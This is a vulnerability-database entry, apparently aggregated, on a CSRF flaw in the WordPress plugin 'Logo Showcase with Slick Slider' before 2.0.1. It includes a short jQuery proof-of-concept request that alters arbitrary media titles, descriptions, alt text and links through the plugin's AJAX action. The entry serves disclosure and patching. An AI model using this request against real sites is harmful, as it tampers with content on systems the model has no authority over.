Lucene search
Apple502jWPEX-ID:2F499945-1924-49F0-AD6E-9192273A5C05HistoryJan 31, 2022 - 12:00 a.m.
Logo Showcase with Slick Slider < 2.0.1 - Arbitrary Media Title/Description/Alt Text/URL Update via CSRF
2022-01-3100:00:00
apple502j
338
arbitrary media title
description update
csrf
slick slider
exploit
jquery.
EPSS
0.001
Percentile
30.0%
The plugin does not have CSRF check in the lswss_save_attachment_data AJAX action, allowing attackers to make a logged in high privilege user, change title, description, alt text, and URL of arbitrary uploaded media.
jQuery.post(ajaxurl,{
action: "lswss_save_attachment_data",
attachment_id: 564,
form_data: "lswss_attachment_title=Test&lswss_attachment_desc=Changed%20via%20CSRF&lswss_attachment_alt=Alt%20text&lswss_attachment_link="
})Related
wpvulndb
wpvulndb
cve
cve
CVE-2021-24913
2022-02-28 09:15:08
cnvd
cnvd
WordPress Slick Slider plugin cross-site request forgery vulnerability
2022-03-02 00:00:00
cvelist
cvelist
prion
prion
Cross site request forgery (csrf)
2022-02-28 09:15:00
patchstack
patchstack
nvd
nvd
CVE-2021-24913
2022-02-28 09:15:08